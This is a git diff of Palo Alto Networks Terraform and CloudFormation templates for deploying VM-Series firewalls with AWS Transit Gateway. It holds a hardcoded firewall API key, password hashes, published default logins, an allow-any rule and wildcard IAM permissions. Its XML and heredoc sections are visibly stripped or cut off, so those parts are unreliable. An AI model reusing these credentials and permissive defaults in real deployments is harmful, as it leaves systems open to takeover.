+*/ + +#----------------------------------------------------------------------------------------------------------------- +# CREATE INBOUND SECURITY VPC +module "vpc_in" { + source = "./modules/vpc_in/" + tag = "${var.tag}" + region = "${var.region}" + tgw_id = "${var.tgw_id}" + tgw_rtb_id = "${var.tgw_rtb_id}" + cidr_vpc = "10.255.0.0/16" + azs = ["us-gov-west-1a", "us-gov-west-1b"] + cidr_mgmt = ["10.255.0.0/28", "10.255.0.16/28"] + cidr_untrust = ["10.255.1.0/28", "10.255.1.16/28"] + cidr_trust = ["10.255.2.0/28", "10.255.2.16/28"] + cidr_tgw = ["10.255.3.0/28", "10.255.3.16/28"] + cidr_natgw = ["10.255.4.0/28", "10.255.4.16/28"] + cidr_lambda = ["10.255.5.0/28", "10.255.5.16/28"] +} + +#----------------------------------------------------------------------------------------------------------------- +# CREATE S3 BUCKET FOR VM-SERIES BOOTSTRAP +module "s3_in" { + source = "./modules/s3_bootstrap/" + + file_location = "bootstrap_files/" + bucket_name = "fw-tgw-inbound-demo" + bucket_name_random = true + config = ["bootstrap.xml", "init-cfg.txt"] + license = ["authcodes"] + content = [] + software = [] + other = ["panw-aws.zip", "pan_nlb_lambda.template", "nlb.zip"] +} + +#----------------------------------------------------------------------------------------------------------------- +# DEPLOY VM-SERIES AUTOSCALE GROUP +module "fw_in" { + source = "./modules/fw_in_asg/" + + tag = "${var.tag}" + region = "${var.region}" + vpc_id = "${module.vpc_in.vpc_id}" + vpc_sg_id = "${module.vpc_in.default_security_group_id}" + lambda_bucket = "${module.s3_in.bucket_name}" + lambda_subnet_id = "${module.vpc_in.lambda_id}" + natgw_subnet_id = "${module.vpc_in.natgw_id}" + + fw_key_name = "${var.key_name}" + fw_bucket = "${module.s3_in.bucket_name}" + fw_ami = "${var.fw_ami}" + fw_vm_type = "m4.xlarge" + fw_sg_source = "${var.fw_sg_source}" + fw_subnet0_id = "${module.vpc_in.mgmt_id}" + fw_subnet1_id = "${module.vpc_in.untrust_id}" + fw_subnet2_id = "${module.vpc_in.trust_id}" + fw_min_instances = "1" // FOR EACH AZ + fw_max_instances = "2" // FOR EACH AZ + fw_scale_threshold_up = "80" + fw_scale_threshold_down = "20" + fw_scale_parameter = "DataPlaneCPUUtilizationPct" + fw_scale_period = "900" + + api_key_firewall = "LUFRPT1Zd2pYUGpkMUNrVEZlb3hROEQyUm95dXNGRkU9N0d4RGpTN2VZaVZYMVVoS253U0p6dlk3MkM0SDFySEh2UUR4Y3hzK2g3ST0=" + api_key_panorama = "" + api_key_delicense = "" + + enable_debug = "No" + + dependencies = [ + "${module.s3_in.completion}", + ] +} + +#----------------------------------------------------------------------------------------------------------------- + diff --git a/aws/tgw_inbound_asg-GovCloud/modules/fw_in_asg/main.tf b/aws/tgw_inbound_asg-GovCloud/modules/fw_in_asg/main.tf new file mode 100644 index 00000000..ff8c4a24 --- /dev/null +++ b/aws/tgw_inbound_asg-GovCloud/modules/fw_in_asg/main.tf @@ -0,0 +1,810 @@ +resource "null_resource" "dependency_getter" { + provisioner "local-exec" { + command = "echo ${length(var.dependencies)}" + } +} + +resource "random_string" "randomstring" { + length = 6 + min_upper = 4 + min_numeric = 2 + special = false +} + +resource "aws_iam_role" "FirewallBootstrapRole" { + name = "${var.tag}-vmseries-${random_string.randomstring.result}" + + assume_role_policy = < + +

+
+### Requirements
+* Existing Transit Gateway
+* Existing Transit Gateway route table for the Security-VPC attachment
+* EC2 Key Pair for deployment region
+* UN/PW: **pandemo** / **demopassword**
+
+
+### How to Deploy
+1. Open **variables.tf** in a text editor.
+2. Uncomment the default values and add the correct value for each of the following variables (an example `terraform.tfvars` sketch appears after this README):
+   * **fw_ami**
+     * Firewall AMI for AWS Region, SKU, & PAN-OS version.
+   * **fw_sg_source**
+     * Source prefix to apply to the VM-Series mgmt. interface
+   * **tgw_id**
+     * Existing Transit Gateway ID
+   * **tgw_rtb_id**
+     * Existing Transit Gateway Route Table ID
+3. Save **variables.tf**.
+4. BYOL ONLY
+   * If you want to license the VM-Series on creation, copy and paste your Auth Code into the /bootstrap/authcodes file. The Auth Code must be registered with your Palo Alto Networks support account before proceeding.
+Before proceeding, make sure you have accepted and subscribed to the VM-Series software in the AWS Marketplace.
+
+
+
+## Support Policy
+The guide in this directory and accompanied files are released under an as-is, best effort, support policy. These scripts should be seen as community supported and Palo Alto Networks will contribute our expertise as and when possible. We do not provide technical support or help in using or troubleshooting the components of the project through our normal support options such as Palo Alto Networks support teams, or ASC (Authorized Support Centers) partners and backline support options. The underlying product used (the VM-Series firewall) by the scripts or templates are still supported, but the support is only for the product functionality and not for help in deploying or using the template or script itself.
+Unless explicitly tagged, all projects or work posted in our GitHub repository (at https://github.com/PaloAltoNetworks) or sites other than our official Downloads page on https://support.paloaltonetworks.com are provided under the best effort policy.
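As an alternative to editing the defaults in place, the same four values can be supplied through a `terraform.tfvars` file, which Terraform loads automatically at plan and apply time. A minimal sketch with placeholder values follows; the IDs and prefixes are illustrative only.

```hcl
# terraform.tfvars -- placeholder values for illustration only, substitute your own.
fw_ami       = "ami-0123456789abcdef0"      # VM-Series AMI for your Region, SKU, and PAN-OS version
fw_sg_source = "203.0.113.0/24"             # source prefix allowed to reach the VM-Series mgmt. interface
tgw_id       = "tgw-0abc123def4567890"      # existing Transit Gateway ID
tgw_rtb_id   = "tgw-rtb-0abc123def4567890"  # existing Transit Gateway route table ID
```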
diff --git a/aws/tgw_inbound_asg/bootstrap_files/authcodes b/aws/tgw_inbound_asg/bootstrap_files/authcodes new file mode 100644 index 00000000..8d1c8b69 --- /dev/null +++ b/aws/tgw_inbound_asg/bootstrap_files/authcodes @@ -0,0 +1 @@ + diff --git a/aws/tgw_inbound_asg/bootstrap_files/bootstrap.xml b/aws/tgw_inbound_asg/bootstrap_files/bootstrap.xml new file mode 100644 index 00000000..e0db5fed --- /dev/null +++ b/aws/tgw_inbound_asg/bootstrap_files/bootstrap.xml @@ -0,0 +1,439 @@ + + + + + + ***** + + + yes + + + c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFDcG9tWXUwNjNjQ2ViamNpd2R3czRyNjluUWNDcXoyQkkvMHR4WjA4RElzQkw3WFNqUmlSRCtvU3pDN1E4bTFOZ1dFcTN5ajRJTlI4Sm01WnZjcDJpRmVCbWdXTmZWc2hFQ1FwU2lMTmJXMFE5L05NRkNiZG9WandRUFhhRmhHTFQ1M2RiR3BzUFc4bE44NnRJam01cCsrYlR5T2tuUzFSUlJMWnNoYjZpSXRxbXZoRVdNRnZ4NG1CdnVxTHVqSHRaN1JhSksveTAxUkxGMXZCRE1aN01mbnVObGgwVXM1cTIwT2k0NjlLNzBrbi81bnF4YzZIWGpPRnRiYUZtUnhwK0FXbGs0a0x4YTdrTE0wNjMxRUgyUlZzY1Q5Q2kzYURVK2JPKzI0dzRGK2Y5U05NeFQzOW1TeFpmWXlMWHlqSGdWeE93QjZuRW5IUUcxSjdCRldHa1QgbXJtLWVhc3R1czEta2V5 + + + + + yes + + + $1$hqikhfkl$1Z1t7bvONQJM1IAh0erho1 + + + + + + + + + + + + + yes + 5 + + + yes + 5 + + + yes + 5 + + + yes + 10 + + + yes + 5 + + + + yes + + + + 10 + 10 + + 100 + 50 + + + + 10 + 10 + + 100 + 50 + + + + + + 100 + yes + + + + + + + + + + + + + + no + + + + + no + + mgmt + + no + + + + + + + + + + no + + + + + no + + mgmt + + no + + + + + + + + + + 3 + 5 + wait-recover + + + + + yes + yes + + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + + 8 + + + + + aes-128-cbc + + + sha256 + + + group19 + + + 8 + + + + + aes-256-cbc + + + sha384 + + + group20 + + + 8 + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + 1 + + + + + + aes-128-gcm + + + none + + + group19 + + 1 + + + + + + aes-256-gcm + + + none + + + group20 + + 1 + + + + + + + aes-128-cbc + + + sha1 + + + + + + + + + + + real-time + + + high + + + high + + + medium + + + medium + + + low + + + low + + + low + + + + + + + + + + no + + + 1.25 + 0.5 + 900 + 300 + 900 + yes + + + + + + ethernet1/1 + ethernet1/2 + + + + + + + + + yes + no + no + no + + + updates.paloaltonetworks.com + + + + + wednesday + 01:02 + download-only + + + + + US/Pacific + + yes + yes + + 192.168.10.16 + 255.255.255.0 + 192.168.10.1 + PA-VM + no + + + + yes + + + FQDN + + + + yes + no + no + no + + + c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFDcG9tWXUwNjNjQ2ViamNpd2R3czRyNjluUWNDcXoyQkkvMHR4WjA4RElzQkw3WFNqUmlSRCtvU3pDN1E4bTFOZ1dFcTN5ajRJTlI4Sm01WnZjcDJpRmVCbWdXTmZWc2hFQ1FwU2lMTmJXMFE5L05NRkNiZG9WandRUFhhRmhHTFQ1M2RiR3BzUFc4bE44NnRJam01cCsrYlR5T2tuUzFSUlJMWnNoYjZpSXRxbXZoRVdNRnZ4NG1CdnVxTHVqSHRaN1JhSksveTAxUkxGMXZCRE1aN01mbnVObGgwVXM1cTIwT2k0NjlLNzBrbi81bnF4YzZIWGpPRnRiYUZtUnhwK0FXbGs0a0x4YTdrTE0wNjMxRUgyUlZzY1Q5Q2kzYURVK2JPKzI0dzRGK2Y5U05NeFQzOW1TeFpmWXlMWHlqSGdWeE93QjZuRW5IUUcxSjdCRldHa1QgbXJtLWVhc3R1czEta2V5 + mgmt-interface-swap + + + + yes + security-i-secur-Publi-MBTK5R0EMJSF_ASG_us-east-1a + + + + + + + + + + + + ethernet1/1 + + + + + + + ethernet1/2 + + + + + + + + + + + + + any + + + any + + + any + + + any + + + any + + + any + + + any + + + any + + + any + + allow + + + + + + + + + + + ethernet1/1 + ethernet1/2 + + + +
+ + 10.255.1.4 + UNTRUST-IP-address + +
+
+
+
+
+
diff --git a/aws/tgw_inbound_asg/bootstrap_files/init-cfg.txt b/aws/tgw_inbound_asg/bootstrap_files/init-cfg.txt new file mode 100644 index 00000000..c77f637b --- /dev/null +++ b/aws/tgw_inbound_asg/bootstrap_files/init-cfg.txt @@ -0,0 +1,10 @@ +type=dhcp-client +ip-address= +default-gateway= +netmask= +ipv6-address= +ipv6-default-gateway= +dhcp-accept-server-hostname=yes +dns-primary=8.8.8.8 +dns-secondary=4.2.2.2 +op-command-modes=mgmt-interface-swap diff --git a/aws/tgw_inbound_asg/bootstrap_files/nlb.zip b/aws/tgw_inbound_asg/bootstrap_files/nlb.zip new file mode 100644 index 00000000..066e08bc Binary files /dev/null and b/aws/tgw_inbound_asg/bootstrap_files/nlb.zip differ diff --git a/aws/tgw_inbound_asg/bootstrap_files/pan_nlb_lambda.template b/aws/tgw_inbound_asg/bootstrap_files/pan_nlb_lambda.template new file mode 100644 index 00000000..5d0b96fd --- /dev/null +++ b/aws/tgw_inbound_asg/bootstrap_files/pan_nlb_lambda.template @@ -0,0 +1,486 @@ +{ + "AWSTemplateFormatVersion" : "2010-09-09", + "Description" : "Creates an AWS Network Load balancer, which multiplexes traffic to registered scaled out back end web servers", + "Parameters": { + "NLBName": { + "Type" : "String", + "Description": "Enter the name of the NLB", + "Default": "prot-nlb", + "MinLength" : "3", + "MaxLength" : "120" + }, + "NLBARN": { + "Type" : "String", + "Description": "Enter the ARN of the NLB", + "Default": "prot-nlb", + "MinLength" : "3", + "MaxLength" : "150" + }, + "QueueURL": { + "Type" : "String", + "Description": "Enter the URL of the Queue to send messages to", + "MinLength" : "3", + "MaxLength" : "1024" + }, + "TableName": { + "Type" : "String", + "Default": "nlb_db_tbl", + "Description": "Enter the name of the database table", + "MinLength" : "3", + "MaxLength" : "120" + }, + "S3BucketName": { + "Type" : "String", + "Description": "Enter the name of the S3 Bucket which contains the lambda code", + "MinLength" : "3", + "MaxLength" : "120" + }, + "S3ObjectName": { + "Type" : "String", + "Default": "nlb.zip", + "Description": "Enter the name of the S3 object which contains the lambda code", + "MinLength" : "3", + "MaxLength" : "120" + }, + "RoleARN": { + "Type": "String", + "Default": "", + "Description": "The ARN of the role to use for Cross Account Access", + "MaxLength" : "120" + }, + "ExternalId": { + "Type": "String", + "Default": "", + "Description": "The external ID associated with the Cross Account Role", + "MaxLength" : "120" + }, + "SameAccount": { + "Type": "String", + "Default": "true", + "Description": "Flag to indicate if the NLB will be deployed into the same account or a different one", + "AllowedValues": [ + "true", + "false" + ] + } + }, + "Metadata" : { + "AWS::CloudFormation::Interface" : { + "ParameterLabels" : { + "NLB ARN": {"Ref": "NLBARN"}, + "NLB Name": {"Ref": "NLBNAME"}, + "Queue URL": {"Ref": "QueueURL"}, + "Table Name": {"Ref": "TableName"}, + "Lambda S3 Bucket Name": {"Ref": "S3BucketName"}, + "Lambda S3 Object Name": {"Ref": "S3ObjectName"} + } + } + }, + "Conditions": { + "CreateCrossAccountRole": {"Fn::Equals" : [{"Ref": "SameAccount"}, "false"] }, + "NoCrossAccountRole": {"Fn::Equals" : [{"Ref": "SameAccount"}, "true"] } + }, + "Resources": { + "LambdaExecutionRole0" : { + "Type": "AWS::IAM::Role", + "Condition": "NoCrossAccountRole", + "Properties": { + "AssumeRolePolicyDocument": { + "Version": "2012-10-17", + "Statement": [ { + "Effect": "Allow", + "Principal": { + "Service": "lambda.amazonaws.com" + }, + "Action": "sts:AssumeRole" + } ] + }, + "Path":"/", + 
"Policies": [ { + "PolicyName": "LambdaExecutionRolePolicy", + "PolicyDocument":{ + "Version": "2012-10-17", + "Statement": [ + { + "Effect": "Allow", + "Action": "s3:ListBucket", + "Resource": { "Fn::Join": [ "", [ "arn:aws:s3:::", {"Ref": "S3BucketName" }, "/*" ] ] } + }, + { + "Effect": "Allow", + "Action": "s3:GetObject", + "Resource": { "Fn::Join": [ "", [ "arn:aws:s3:::", { "Ref": "S3BucketName" }, "/*" ] ] } + }, + { + "Effect": "Allow", + "Action": [ + "ec2:DescribeSubnets" + ], + "Resource": [ + "*" + ] + }, + { + "Effect": "Allow", + "Action": [ + "events:*" + ], + "Resource": [ + "*" + ] + }, + { + "Effect": "Allow", + "Action": [ + "cloudwatch:*" + ], + "Resource": [ + "*" + ] + }, + { + "Effect": "Allow", + "Action": [ + "lambda:AddPermission", + "lambda:CreateEventSourceMapping", + "lambda:CreateFunction", + "lambda:DeleteEventSourceMapping", + "lambda:DeleteFunction", + "lambda:GetEventSourceMapping", + "lambda:ListEventSourceMappings", + "lambda:RemovePermission", + "lambda:UpdateEventSourceMapping", + "lambda:UpdateFunctionCode", + "lambda:UpdateFunctionConfiguration", + "lambda:GetFunction", + "lambda:ListFunctions" + ], + "Resource": [ + "*" + ] + }, + { + "Effect": "Allow", + "Action": [ + "sqs:ReceiveMessage", + "sqs:SendMessage", + "sqs:SetQueueAttributes", + "sqs:PurgeQueue" + ], + "Resource": [ + "*" + ] + }, + { + "Effect": "Allow", + "Action": [ + "elasticloadbalancing:AddTags", + "elasticloadbalancing:AttachLoadBalancerToSubnets", + "elasticloadbalancing:ConfigureHealthCheck", + "elasticloadbalancing:DescribeInstanceHealth", + "elasticloadbalancing:DescribeLoadBalancerAttributes", + "elasticloadbalancing:DescribeLoadBalancerPolicyTypes", + "elasticloadbalancing:DescribeLoadBalancerPolicies", + "elasticloadbalancing:DescribeLoadBalancers", + "elasticloadbalancing:DescribeTags", + "elasticloadbalancing:DetachLoadBalancerFromSubnets", + "elasticloadbalancing:ModifyLoadBalancerAttributes", + "elasticloadbalancing:RemoveTags" + ], + "Resource": [ + "*" + ] + }, + { + "Effect": "Allow", + "Action": [ + "iam:PassRole", + "iam:GetRole" + ], + "Resource": [ + "*" + ] + }, + { + "Effect": "Allow", + "Action": ["logs:CreateLogGroup","logs:CreateLogStream","logs:PutLogEvents"], + "Resource": "arn:aws:logs:*:*:*" + }, + { + "Effect": "Allow", + "Action": ["cloudformation:DescribeStacks"], + "Resource": "*" + }, + { + "Effect": "Allow", + "Action": [ + "logs:CreateLogGroup", + "logs:CreateLogStream", + "logs:PutDestination", + "logs:PutDestinationPolicy", + "logs:PutLogEvents", + "logs:PutMetricFilter" + ], + "Resource": [ + "*" + ] + }, + { + "Effect": "Allow", + "Action": [ + "dynamodb:CreateTable", + "dynamodb:DeleteItem", + "dynamodb:DeleteTable", + "dynamodb:GetItem", + "dynamodb:PutItem" + ], + "Resource": [ + "*" + ] + } + ] + }}]} + }, + "LambdaExecutionRole1" : { + "Type": "AWS::IAM::Role", + "Condition": "CreateCrossAccountRole", + "Properties": { + "AssumeRolePolicyDocument": { + "Version": "2012-10-17", + "Statement": [ { + "Effect": "Allow", + "Principal": { + "Service": "lambda.amazonaws.com" + }, + "Action": "sts:AssumeRole" + } ] + }, + "Path":"/", + "Policies": [ { + "PolicyName": "LambdaExecutionRolePolicy", + "PolicyDocument":{ + "Version": "2012-10-17", + "Statement": [ + { + "Effect": "Allow", + "Action": "sts:AssumeRole", + "Resource": {"Ref": "RoleARN"} + }, + { + "Effect": "Allow", + "Action": "s3:ListBucket", + "Resource": { "Fn::Join": [ "", [ "arn:aws:s3:::", {"Ref": "S3BucketName" }, "/*" ] ] } + }, + { + "Effect": "Allow", + "Action": 
"s3:GetObject", + "Resource": { "Fn::Join": [ "", [ "arn:aws:s3:::", { "Ref": "S3BucketName" }, "/*" ] ] } + }, + { + "Effect": "Allow", + "Action": [ + "ec2:DescribeSubnets" + ], + "Resource": [ + "*" + ] + }, + { + "Effect": "Allow", + "Action": [ + "events:*" + ], + "Resource": [ + "*" + ] + }, + { + "Effect": "Allow", + "Action": [ + "cloudwatch:*" + ], + "Resource": [ + "*" + ] + }, + { + "Effect": "Allow", + "Action": [ + "lambda:AddPermission", + "lambda:CreateEventSourceMapping", + "lambda:CreateFunction", + "lambda:DeleteEventSourceMapping", + "lambda:DeleteFunction", + "lambda:GetEventSourceMapping", + "lambda:ListEventSourceMappings", + "lambda:RemovePermission", + "lambda:UpdateEventSourceMapping", + "lambda:UpdateFunctionCode", + "lambda:UpdateFunctionConfiguration", + "lambda:GetFunction", + "lambda:ListFunctions" + ], + "Resource": [ + "*" + ] + }, + { + "Effect": "Allow", + "Action": [ + "sqs:ReceiveMessage", + "sqs:SendMessage", + "sqs:SetQueueAttributes", + "sqs:PurgeQueue" + ], + "Resource": [ + "*" + ] + }, + { + "Effect": "Allow", + "Action": [ + "elasticloadbalancing:AddTags", + "elasticloadbalancing:AttachLoadBalancerToSubnets", + "elasticloadbalancing:ConfigureHealthCheck", + "elasticloadbalancing:DescribeInstanceHealth", + "elasticloadbalancing:DescribeLoadBalancerAttributes", + "elasticloadbalancing:DescribeLoadBalancerPolicyTypes", + "elasticloadbalancing:DescribeLoadBalancerPolicies", + "elasticloadbalancing:DescribeLoadBalancers", + "elasticloadbalancing:DescribeTags", + "elasticloadbalancing:DetachLoadBalancerFromSubnets", + "elasticloadbalancing:ModifyLoadBalancerAttributes", + "elasticloadbalancing:RemoveTags" + ], + "Resource": [ + "*" + ] + }, + { + "Effect": "Allow", + "Action": [ + "iam:PassRole", + "iam:GetRole" + ], + "Resource": [ + "*" + ] + }, + { + "Effect": "Allow", + "Action": ["logs:CreateLogGroup","logs:CreateLogStream","logs:PutLogEvents"], + "Resource": "arn:aws:logs:*:*:*" + }, + { + "Effect": "Allow", + "Action": ["cloudformation:DescribeStacks"], + "Resource": "*" + }, + { + "Effect": "Allow", + "Action": [ + "logs:CreateLogGroup", + "logs:CreateLogStream", + "logs:PutDestination", + "logs:PutDestinationPolicy", + "logs:PutLogEvents", + "logs:PutMetricFilter" + ], + "Resource": [ + "*" + ] + }, + { + "Effect": "Allow", + "Action": [ + "dynamodb:CreateTable", + "dynamodb:DeleteItem", + "dynamodb:DeleteTable", + "dynamodb:GetItem", + "dynamodb:PutItem" + ], + "Resource": [ + "*" + ] + } + ] + }}]} + }, + "NLBDeployerLambda0" : { + "Type": "AWS::Lambda::Function", + "Condition": "NoCrossAccountRole", + "Properties": { + "Handler": "nlb_deployer.nlb_deploy_handler", + "Role": {"Fn::GetAtt" : + ["LambdaExecutionRole0", + "Arn" + ] + }, + "Code": { + "S3Bucket": { "Ref": "S3BucketName"}, + "S3Key": { "Ref": "S3ObjectName"} + }, + "Runtime": "python2.7", + "Timeout": "300" + } + }, + "NLBDeployerLambda1" : { + "Type": "AWS::Lambda::Function", + "Condition": "CreateCrossAccountRole", + "Properties": { + "Handler": "nlb_deployer.nlb_deploy_handler", + "Role": {"Fn::GetAtt" : + ["LambdaExecutionRole1", + "Arn" + ] + }, + "Code": { + "S3Bucket": { "Ref": "S3BucketName"}, + "S3Key": { "Ref": "S3ObjectName"} + }, + "Runtime": "python2.7", + "Timeout": "300" + } + }, + "LambdaCustomResource0": { + "Type": "AWS::CloudFormation::CustomResource", + "Condition": "NoCrossAccountRole", + "Version" : "1.0", + "DependsOn": ["NLBDeployerLambda0"], + "Properties" : { + "ServiceToken": { "Fn::GetAtt" : ["NLBDeployerLambda0", "Arn"] }, + "StackName": {"Ref": 
"AWS::StackName"}, + "Region": {"Ref": "AWS::Region"}, + "table_name": {"Ref": "TableName"}, + "NLB-ARN": {"Ref": "NLBARN"}, + "NLB-NAME": {"Ref": "NLBName"}, + "LambdaExecutionRole": {"Ref": "LambdaExecutionRole0"}, + "S3BucketName": {"Ref": "S3BucketName"}, + "S3ObjectName": {"Ref": "S3ObjectName"}, + "QueueURL": {"Ref": "QueueURL"}, + "RoleARN": {"Ref": "RoleARN"}, + "ExternalId": {"Ref": "ExternalId"} + } + }, + "LambdaCustomResource1": { + "Type": "AWS::CloudFormation::CustomResource", + "Condition": "CreateCrossAccountRole", + "Version" : "1.0", + "DependsOn": ["NLBDeployerLambda1"], + "Properties" : { + "ServiceToken": { "Fn::GetAtt" : ["NLBDeployerLambda1", "Arn"] }, + "StackName": {"Ref": "AWS::StackName"}, + "Region": {"Ref": "AWS::Region"}, + "table_name": {"Ref": "TableName"}, + "NLB-ARN": {"Ref": "NLBARN"}, + "NLB-NAME": {"Ref": "NLBName"}, + "LambdaExecutionRole": {"Ref": "LambdaExecutionRole1"}, + "S3BucketName": {"Ref": "S3BucketName"}, + "S3ObjectName": {"Ref": "S3ObjectName"}, + "QueueURL": {"Ref": "QueueURL"}, + "RoleARN": {"Ref": "RoleARN"}, + "ExternalId": {"Ref": "ExternalId"} + } + } + } +} diff --git a/aws/tgw_inbound_asg/bootstrap_files/panw-aws.zip b/aws/tgw_inbound_asg/bootstrap_files/panw-aws.zip new file mode 100644 index 00000000..83dbc829 Binary files /dev/null and b/aws/tgw_inbound_asg/bootstrap_files/panw-aws.zip differ diff --git a/aws/tgw_inbound_asg/diagram.png b/aws/tgw_inbound_asg/diagram.png new file mode 100644 index 00000000..59f6541c Binary files /dev/null and b/aws/tgw_inbound_asg/diagram.png differ diff --git a/aws/tgw_inbound_asg/main.tf b/aws/tgw_inbound_asg/main.tf new file mode 100644 index 00000000..4b426bba --- /dev/null +++ b/aws/tgw_inbound_asg/main.tf @@ -0,0 +1,87 @@ +/* + SUPPORT POLICY +The guide in this directory and accompanied files are released under an as-is, best effort, support policy. +These scripts should be seen as community supported and Palo Alto Networks will contribute our expertise as +and when possible. We do not provide technical support or help in using or troubleshooting the components of +the project through our normal support options such as Palo Alto Networks support teams, or ASC (Authorized +Support Centers) partners and backline support options. The underlying product used (the VM-Series firewall) +by the scripts or templates are still supported, but the support is only for the product functionality and +not for help in deploying or using the template or script itself. Unless explicitly tagged, all projects or +work posted in our GitHub repository (at https://github.com/PaloAltoNetworks) or sites other than our official +Downloads page on https://support.paloaltonetworks.com are provided under the best effort policy. 
+*/ + +#----------------------------------------------------------------------------------------------------------------- +# CREATE INBOUND SECURITY VPC +module "vpc_in" { + source = "./modules/vpc_in/" + tag = "${var.tag}" + region = "${var.region}" + tgw_id = "${var.tgw_id}" + tgw_rtb_id = "${var.tgw_rtb_id}" + cidr_vpc = "10.255.0.0/16" + azs = ["us-east-1a", "us-east-1b"] + cidr_mgmt = ["10.255.0.0/28", "10.255.0.16/28"] + cidr_untrust = ["10.255.1.0/28", "10.255.1.16/28"] + cidr_trust = ["10.255.2.0/28", "10.255.2.16/28"] + cidr_tgw = ["10.255.3.0/28", "10.255.3.16/28"] + cidr_natgw = ["10.255.4.0/28", "10.255.4.16/28"] + cidr_lambda = ["10.255.5.0/28", "10.255.5.16/28"] +} + +#----------------------------------------------------------------------------------------------------------------- +# CREATE S3 BUCKET FOR VM-SERIES BOOTSTRAP +module "s3_in" { + source = "./modules/s3_bootstrap/" + + file_location = "bootstrap_files/" + bucket_name = "fw-tgw-inbound-demo" + bucket_name_random = true + config = ["bootstrap.xml", "init-cfg.txt"] + license = ["authcodes"] + content = [] + software = [] + other = ["panw-aws.zip", "pan_nlb_lambda.template", "nlb.zip"] +} + +#----------------------------------------------------------------------------------------------------------------- +# DEPLOY VM-SERIES AUTOSCALE GROUP +module "fw_in" { + source = "./modules/fw_in_asg/" + + tag = "${var.tag}" + region = "${var.region}" + vpc_id = "${module.vpc_in.vpc_id}" + vpc_sg_id = "${module.vpc_in.default_security_group_id}" + lambda_bucket = "${module.s3_in.bucket_name}" + lambda_subnet_id = "${module.vpc_in.lambda_id}" + natgw_subnet_id = "${module.vpc_in.natgw_id}" + + fw_key_name = "${var.key_name}" + fw_bucket = "${module.s3_in.bucket_name}" + fw_ami = "${var.fw_ami}" + fw_vm_type = "m4.xlarge" + fw_sg_source = "${var.fw_sg_source}" + fw_subnet0_id = "${module.vpc_in.mgmt_id}" + fw_subnet1_id = "${module.vpc_in.untrust_id}" + fw_subnet2_id = "${module.vpc_in.trust_id}" + fw_min_instances = "1" // FOR EACH AZ + fw_max_instances = "2" // FOR EACH AZ + fw_scale_threshold_up = "80" + fw_scale_threshold_down = "20" + fw_scale_parameter = "DataPlaneCPUUtilizationPct" + fw_scale_period = "900" + + api_key_firewall = "LUFRPT1Zd2pYUGpkMUNrVEZlb3hROEQyUm95dXNGRkU9N0d4RGpTN2VZaVZYMVVoS253U0p6dlk3MkM0SDFySEh2UUR4Y3hzK2g3ST0=" + api_key_panorama = "" + api_key_delicense = "" + + enable_debug = "No" + + dependencies = [ + "${module.s3_in.completion}", + ] +} + +#----------------------------------------------------------------------------------------------------------------- + diff --git a/aws/tgw_inbound_asg/modules/fw_in_asg/main.tf b/aws/tgw_inbound_asg/modules/fw_in_asg/main.tf new file mode 100644 index 00000000..35f18c1e --- /dev/null +++ b/aws/tgw_inbound_asg/modules/fw_in_asg/main.tf @@ -0,0 +1,810 @@ +resource "null_resource" "dependency_getter" { + provisioner "local-exec" { + command = "echo ${length(var.dependencies)}" + } +} + +resource "random_string" "randomstring" { + length = 6 + min_upper = 4 + min_numeric = 2 + special = false +} + +resource "aws_iam_role" "FirewallBootstrapRole" { + name = "${var.tag}-vmseries-${random_string.randomstring.result}" + + assume_role_policy = < + +

+
+#### VM-Series Overview
+* Firewall-1 handles egress traffic to the internet
+* Firewall-2 handles east/west traffic between Spoke1-VPC and Spoke2-VPC
+* Both Firewalls can handle inbound traffic to the spokes
+* Firewalls are bootstrapped off an S3 Bucket (buckets are created during deployment)
+
+#### S3 Buckets Overview
+* 2 x S3 Buckets are deployed & configured to bootstrap the firewalls with a fully working configuration.
+* The bucket names have a random 30-character string appended for global uniqueness: `tgw-fw#-bootstrap-`
+
+## Prerequisites
+1. This Terraform build assumes the AWS CLI is installed on the machine doing the deployment [(Install AWS CLI)](https://docs.aws.amazon.com/cli/latest/userguide/cli-chap-install.html).
+2. If you do not want to use the AWS CLI, the `providers.tf` must be modified to include your AWS Access Key and Secret Key [(more info)](https://www.terraform.io/docs/providers/aws/index.html).
+
+## How to Deploy
+1. Download the **transitgateway-demo-v2** directory.
+2. In an editor, open `variables.tf`
+   * `Line 10`: Set your existing AWS EC2 Key Pair
+   * `Line 14`: Enter a source address to access the VM-Series management interface (in valid CIDR notation). This address will be added to the management interface's Network Security Group.
+   * `Line 17`: Uncomment either 'byol', 'payg1', or 'payg2'. This sets the licensing for both VM-Series firewalls (bring-your-own-license, bundle1, or bundle2).
+3. (Optional) If you are using BYOL and would like to license the VM-Series via bootstrapping, paste your authcode in `bootstrap_files/fw1/authcodes` and `bootstrap_files/fw2/authcodes`. (Note: the authcode must be registered prior to deployment.)
+4. After deployment, the firewalls' username and password are:
+   * **Username:** paloalto
+   * **Password:** PanPassword123!
+
+
+
+## Support Policy
+The guide in this directory and accompanied files are released under an as-is, best effort, support policy. These scripts should be seen as community supported and Palo Alto Networks will contribute our expertise as and when possible. We do not provide technical support or help in using or troubleshooting the components of the project through our normal support options such as Palo Alto Networks support teams, or ASC (Authorized Support Centers) partners and backline support options. The underlying product used (the VM-Series firewall) by the scripts or templates are still supported, but the support is only for the product functionality and not for help in deploying or using the template or script itself.
+Unless explicitly tagged, all projects or work posted in our GitHub repository (at https://github.com/PaloAltoNetworks) or sites other than our official Downloads page on https://support.paloaltonetworks.com are provided under the best effort policy.
diff --git a/aws/transitgateway-demo-v2/bootstrap_files/fw1/authcodes b/aws/transitgateway-demo-v2/bootstrap_files/fw1/authcodes
new file mode 100644
index 00000000..8b137891
--- /dev/null
+++ b/aws/transitgateway-demo-v2/bootstrap_files/fw1/authcodes
@@ -0,0 +1 @@
+
diff --git a/aws/transitgateway-demo-v2/bootstrap_files/fw1/bootstrap.xml b/aws/transitgateway-demo-v2/bootstrap_files/fw1/bootstrap.xml
new file mode 100644
index 00000000..c9e19aeb
--- /dev/null
+++ b/aws/transitgateway-demo-v2/bootstrap_files/fw1/bootstrap.xml
@@ -0,0 +1,822 @@
+ + + + + + $1$kinpefww$Y2Rzm/JZNfQxs6SB3oW5A.
